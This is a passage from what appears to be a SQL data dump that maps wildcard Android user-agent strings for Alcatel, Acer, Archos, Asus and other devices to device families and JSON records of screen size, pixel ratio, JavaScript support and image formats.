Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 6036Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 6037K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 6037Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 6043A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 6043D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 6050Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 630) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 7040N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 7040T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 7045Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 7050Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 7055A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 8030Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 8055) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 9002X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 9005X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 9300) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A 9+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A1-810) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A1-830) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A1-840FHD) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A11w) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A3-A10) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A3-A20) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A3-A20FHD) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A40C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A463BG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A5EI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A77) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; A820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; AC50BHE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ADR6400L 4G) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc_adr','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ADVAN S5E Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL 4015T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 4030D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 4037T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 5020A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 5020T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 5035D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 5036A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 5036A) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 5036D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 5036D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 5036X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 5037E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 6012X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 6030D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 6030X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 6030X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 6033X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 6040D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7040A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7040A) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7041D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7041D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7041X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7041X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7042A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7042E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7047D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 7047D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 8008D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH 8020X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH Fierce) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH P310A) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_alcatel','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH P310X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_alcatel','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL ONE TOUCH P320X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_alcatel','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL_ONE_TOUCH_6030X_Orange) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ALCATEL_one_touch_4030A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ANDY_35E2I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ANDY_55EI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ARCHOS 40d Titanium) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ARCHOS 50c Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ARK_Benefit_M4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; AST21) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS Tablet P1801-T) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_asus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":1080,\"screenHeight\":1920,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS Transformer Pad TF300T) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_asus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 